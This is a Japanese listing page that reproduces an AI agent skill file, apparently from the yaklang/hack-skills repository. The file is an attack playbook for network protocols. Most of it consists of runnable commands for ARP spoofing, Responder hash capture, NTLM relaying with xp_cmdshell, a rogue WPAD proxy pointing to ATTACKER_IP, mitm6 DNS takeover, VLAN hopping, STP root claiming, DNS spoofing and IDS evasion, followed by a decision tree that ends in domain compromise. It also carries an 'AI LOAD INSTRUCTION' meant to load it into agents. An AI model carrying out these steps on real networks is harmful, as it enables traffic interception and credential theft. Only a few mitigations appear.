network-protocol-attacks
ARP スプーフィング、LLMNR/NBT-NS/mDNS ポイズニング、WPAD 悪用、DHCPv6 攻撃、VLAN ホッピング、STP 操作、DNS スプーフィング、IPv6 攻撃、IDS/IPS 回避など、レイヤー 2/3 プロトコルの脆弱性を突く際に使用するネットワークプロトコル攻撃のプレイブック。ペネトレーションテストにおける中間者攻撃やネットワーク盗聴の手順を体系的に参照できる。
description の原文を見る
>- Network protocol attack playbook. Use when exploiting layer 2/3 protocols including ARP spoofing, LLMNR/NBT-NS/mDNS poisoning, WPAD abuse, DHCPv6 attacks, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion.
SKILL.md 本文
SKILL: Network Protocol Attacks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.
0. RELATED ROUTING
Before going deep, consider loading:
tunneling-and-pivotingMitM ポジション確立後のトラフィックリダイレクション用ntlm-relay-coercionポイズニング攻撃からキャプチャした NTLM ハッシュのリレー用unauthorized-access-common-servicesネットワーク攻撃中に発見されたサービスの悪用用traffic-analysis-pcapMitM からキャプチャしたトラフィック分析用
Advanced Reference
また NAME_RESOLUTION_POISONING.md を以下が必要な場合にロードしてください:
- Responder/mitm6 の詳細な設定とワークフロー
- NTLM リレー対象の選択とチェーン構成
- 認証情報フォーマット分析とクラッキング優先度
1. ARP SPOOFING
Gratuitous ARP — MitM ポジショニング
# arpspoof (dsniff suite)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
# ettercap — ARP ポイズニングとスニッフィング
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//
# bettercap — モダンフレームワーク
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on
選別的なターゲティング
# bettercap — 特定ホストをターゲット、検出回避
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true
> set arp.spoof.internal true
> arp.spoof on
検出インジケータ
- ARP テーブルの重複 MAC アドレス
- 非ゲートウェイ IP からの Gratuitous ARP ストーム
- ツール:
arpwatch、static ARP エントリ、802.1X ポート認証
2. LLMNR / NBT-NS / mDNS POISONING
Responder — 認証情報キャプチャ
# 基本的なポイズニング (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv
# キーフラグ:
# -d DHCP ブロードキャストリクエストの応答を有効化 (フィンガープリント用)
# -w WPAD 不正プロキシを起動
# -P WPAD に NTLM 認証を強制
# -v 詳細出力
# 分析モードのみ (パッシブ、ポイズニングなし)
responder -I eth0 -A
キャプチャされたハッシュフォーマット
| プロトコル | ハッシュタイプ | Hashcat モード | クラック難易度 |
|---|---|---|---|
| NTLMv1 | NetNTLMv1 | 5500 | 高速 — レインボーテーブル可能 |
| NTLMv2 | NetNTLMv2 | 5600 | 中程度 — 辞書 + ルール |
| NTLMv1-ESS | NetNTLMv1 | 5500 | 高速 — NTLMv1 と同じ |
# キャプチャされたハッシュをクラック
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
クラックの代わりにリレー
# ntlmrelayx — キャプチャした NTLM を他のサービスにリレー
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access # RBCD 攻撃
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"
3. WPAD ABUSE
# WPAD プロキシ付き Responder
responder -I eth0 -wPv
# WPAD フロー:
# 1. クライアントが DHCP で WPAD をクエリ → DNS で wpad.domain.com をクエリ → LLMNR/NBT-NS
# 2. Responder が不正な wpad.dat で応答
# 3. ブラウザが攻撃者のプロキシを使用 → 強制 NTLM 認証 → 認証情報キャプチャ
手動 WPAD PAC ファイル
// 不正な wpad.dat コンテンツ
function FindProxyForURL(url, host) {
return "PROXY ATTACKER_IP:3128; DIRECT";
}
4. DHCPv6 ATTACK — mitm6
IPv4 のみのネットワーク上であっても、Windows クライアントはデフォルトで DHCPv6 ソリシテーションを送信します。
# mitm6 → DNS 乗っ取り → NTLM リレー
mitm6 -d domain.com
# 並列実行: キャプチャした NTLM を LDAP(S) にリレー委譲用
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access
# 攻撃チェーン:
# 1. mitm6 が DHCPv6 に応答 → 攻撃者を IPv6 DNS として設定
# 2. 被害者の DNS クエリが攻撃者に送信 → WPAD リダイレクト
# 3. 強制 NTLM 認証 → LDAP にリレー → マシンアカウント作成または RBCD
キーとなる条件
- SMB 署名がターゲットで無効化されている (SMB リレー用)
- LDAP 署名が DC で強制されていない (LDAP リレー用)
- ドメイン コンピューター クォータ > 0 (マシンアカウント作成用、デフォルト: 10)
5. VLAN HOPPING
スイッチスプーフィング (DTP)
# yersinia — DTP 攻撃でトランク ネゴシエーション
yersinia dtp -attack 1 -interface eth0
# frogger.sh — DTP 経由の自動 VLAN ホッピング
./frogger.sh
# DTP フレームを送信 → スイッチがトランキングを有効化 → すべての VLAN にアクセス
# トランク確立後:
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
ダブルタギング (802.1Q)
# ダブルタグフレームを作成: 外層=ネイティブ VLAN、内層=ターゲット VLAN
# scapy:
from scapy.all import *
pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")
# 制限: 一方向のみ (レスポンスは実ゲートウェイに返信される)
# ブラインド攻撃に有効 (例: サーバーをターゲット)
緩和策
- DTP を無効化:
switchport nonegotiate - ネイティブ VLAN を未使用に設定:
switchport trunk native vlan 999 - VLAN をプルーン: トランクポートで必要な VLAN のみを許可
6. STP MANIPULATION
ルートブリッジの請求
# yersinia — 最小優先度でルートブリッジになる
yersinia stp -attack 4 -interface eth0
# 優先度 0 の BPDU を送信 → ルートブリッジになる
# すべてのトラフィックが攻撃者経由で流れる → MitM
トポロジ変更攻撃
# TC (Topology Change) BPDU を送信 → MAC テーブルフラッシュを強制
yersinia stp -attack 1 -interface eth0
# スイッチがすべてのポートに一時的にフラッド → トラフィックをスニッフィング
緩和策
- アクセスポートでの BPDU Guard
- 指定ポートでの Root Guard
spanning-tree portfast bpduguard enable
7. DNS SPOOFING
DNS キャッシュポイズニング
# bettercap DNS スプーフィング
bettercap -iface eth0
> set dns.spoof.domains target.com, *.target.com
> set dns.spoof.address ATTACKER_IP
> dns.spoof on
# ettercap DNS スプーフィング (etter.dns 設定経由)
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
Kaminsky 攻撃の変種
ランダムなサブドメインに対して不正な応答でリカーシブリゾルバーをフラッド攻撃し、各応答に悪意のあるオーソリティセクションを含めて NS レコードを攻撃者管理サーバーに指す。
8. IPv6 ATTACKS
ルータアドバタイズメント スプーフィング
# 不正な RA を送信 → 被害者が攻撃者をデフォルトゲートウェイとして設定
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64
# THC-IPv6 スイートで包括的な IPv6 攻撃
atk6-parasite6 eth0 # ICMPv6 neighbor spoofing
atk6-redir6 eth0 ... # ICMPv6 redirect 経由のトラフィックリダイレクション
SLAAC 乱用
# 不正なプレフィックスをアドバタイズ → 被害者が IPv6 アドレスを自動設定
# 不正な DNS (RA オプション) と組み合わせ → IPv6 上での完全な MitM
# Windows はデフォルトで IPv6 を IPv4 より優先
9. IDS/IPS EVASION
| 技術 | 方法 | ツール/フラグ |
|---|---|---|
| IP フラグメンテーション | ペイロードをフラグメント間に分割 | nmap -f、fragroute |
| TTL 操作 | TTL を IDS で期限切れにするがターゲットには到達するように設定 | fragroute |
| エンコーディング回避 | URL/Unicode/hex エンコーディング | 手動、カスタムスクリプト |
| セッションスプライシング | TCP ペイロードをセグメント間に分割 | fragroute、nmap --data-length |
| タイミングベース | 検出を避けるため低速スキャン | nmap -T0、nmap -T1 |
| デコイスキャニング | 実スキャンにデコイソース IP を混在 | nmap -D RND:10 |
| アイドル/ゾンビスキャン | アイドルホストをスキャンプロキシとして使用 | nmap -sI ZOMBIE_IP |
# fragroute — パケットのフラグメント化と並び替え
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP
# nmap 回避組み合わせ
nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET
10. DECISION TREE
ネットワークアクセス取得 — ネットワーク攻撃経由でエスカレーションしたい
│
├── ターゲットと同じブロードキャストドメイン上?
│ ├── はい → MitM 用に ARP スプーフィング (§1)
│ │ └── 平文認証情報をキャプチャまたはトラフィックをリダイレクト
│ └── いいえ → 最初に VLAN ホッピングが必要 (§5)
│ ├── DTP 有効? → スイッチスプーフィング
│ └── ネイティブ VLAN を知っている? → ダブルタギング
│
├── Windows 環境?
│ ├── LLMNR/NBT-NS 有効? (デフォルト はい)
│ │ └── Responder を実行 (§2) → NetNTLM ハッシュをキャプチャ
│ │ ├── NTLMv1? → 高速クラックまたはリレー
│ │ └── NTLMv2? → リレー (§2) またはルールでクラック
│ │
│ ├── WPAD 設定またはオートディテクト? → WPAD 乱用 (§3)
│ │
│ └── IPv6 が強化されていない? (デフォルト) → mitm6 + ntlmrelayx (§4)
│ └── LDAP リレー → RBCD → ドメイン侵害
│
├── DNS 制御が必要?
│ ├── MitM すでに確立? → DNS スプーフィング (§7)
│ └── DHCPv6 利用可能? → DNS 乗っ取り用 mitm6 (§4)
│
├── 設定の弱いマネージドスイッチ?
│ ├── BPDU Guard がオフ? → STP ルートブリッジ請求 (§6)
│ └── DTP 有効? → VLAN ホッピング (§5)
│
├── IPv6 攻撃面?
│ └── RA スプーフィング / SLAAC 乱用 (§8) → IPv6 上での MitM
│
└── パス内に IDS/IPS?
└── 回避技術を適用 (§9) — フラグメンテーション、タイミング、エンコーディング
ライセンス: MIT(寛容ライセンスのため全文を引用しています) · 原本リポジトリ
詳細情報
- 作者
- yaklang
- リポジトリ
- yaklang/hack-skills
- ライセンス
- MIT
- 最終更新
- 不明
Source: https://github.com/yaklang/hack-skills / ライセンス: MIT
関連スキル
superfluid
Superfluidプロトコルおよびそのエコシステムに関するナレッジベースです。Superfluidについて情報を検索する際は、ウェブ検索の前にこちらを参照してください。対応キーワード:Superfluid、CFA、GDA、Super App、Super Token、stream、flow rate、real-time balance、pool(member/distributor)、IDA、sentinels、liquidation、TOGA、@sfpro/sdk、semantic money、yellowpaper、whitepaper
civ-finish-quotes
実質的なタスクが真に完了した際に、文明風の儀式的な引用句を追加します。ユーザーやエージェントが機能追加、リファクタリング、分析、設計ドキュメント、プロセス改善、レポート、執筆タスクといった実際の成果物を完成させるときに、明示的な依頼がなくても使用します。短い返信や小さな修正、未完成の作業には適用しません。
nookplot
Base(Ethereum L2)上のAIエージェント向け分散型調整ネットワークです。エージェントがオンチェーンアイデンティティを登録する、コンテンツを公開する、他のエージェントにメッセージを送る、マーケットプレイスで専門家を雇う、バウンティを投稿・請求する、レピュテーションを構築する、共有プロジェクトで協業する、リサーチチャレンジを解くことでNOOKをマイニングする、キュレーションされたナレッジを備えたスタンドアロンオンチェーンエージェントをデプロイする、またはアグリーメントとリワードで収益を得る場合に利用できます。エージェントネットワーク、エージェント調整、分散型エージェント、NOOKトークン、マイニングチャレンジ、ナレッジバンドル、エージェントレピュテーション、エージェントマーケットプレイス、ERC-2771メタトランザクション、Prepare-Sign-Relay、AgentFactory、またはNookplotが言及された場合にトリガーされます。
web3-polymarket
Polygon上でのPolymarket予測市場取引統合です。認証機能(L1 EIP-712、L2 HMAC-SHA256、ビルダーヘッダー)、注文発注(GTC/GTD/FOK/FAK、バッチ、ポストオンリー、ハートビート)、市場データ(Gamma API、Data API、オーダーブック、サブグラフ)、WebSocketストリーミング(市場・ユーザー・スポーツチャネル)、CTF操作(分割、統合、償却、ネガティブリスク)、ブリッジ機能(入金、出金、マルチチェーン)、およびガスレスリレイトランザクションに対応しています。AIエージェント、自動マーケットメーカー、予測市場UI、またはPolygraph上のPolymarketと統合するアプリケーション構築時に活用できます。
ethskills
Ethereum、EVM、またはブロックチェーン関連のリクエストに対応します。スマートコントラクト、dApps、ウォレット、DeFiプロトコルの構築、監査、デプロイ、インタラクションに適用されます。Solidityの開発、コントラクトアドレス、トークン規格(ERC-20、ERC-721、ERC-4626など)、Layer 2ネットワーク(Base、Arbitrum、Optimism、zkSync、Polygon)、Uniswap、Aave、Curveなどのプロトコルとの統合をカバーします。ガスコスト、コントラクトのデシマル設定、オラクルセキュリティ、リエントランシー、MEV、ブリッジング、ウォレット管理、オンチェーンデータの取得、本番環境へのデプロイ、プロトコル進化(EIPライフサイクル、フォーク追跡、今後の変更予定)といったトピックを含みます。
xxyy-trade
このスキルは、ユーザーが「トークン購入」「トークン売却」「トークンスワップ」「暗号資産取引」「取引ステータス確認」「トランザクション照会」「トークンスキャン」「フィード」「チェーン監視」「トークン照会」「トークン詳細」「トークン安全性確認」「ウォレット一覧表示」「マイウォレット」「AIスキャン」「自動スキャン」「ツイートスキャン」「オンボーディング」「IP確認」「IPホワイトリスト」「トークン発行」「自動売却」「損切り」「利益確定」「トレーリングストップ」「保有者」「トップホルダー」「KOLホルダー」などをリクエストした場合、またはSolana/ETH/BSC/BaseチェーンでXXYYを経由した取引について言及した場合に使用します。XXYY Open APIを通じてオンチェーン取引とデータ照会を実現します。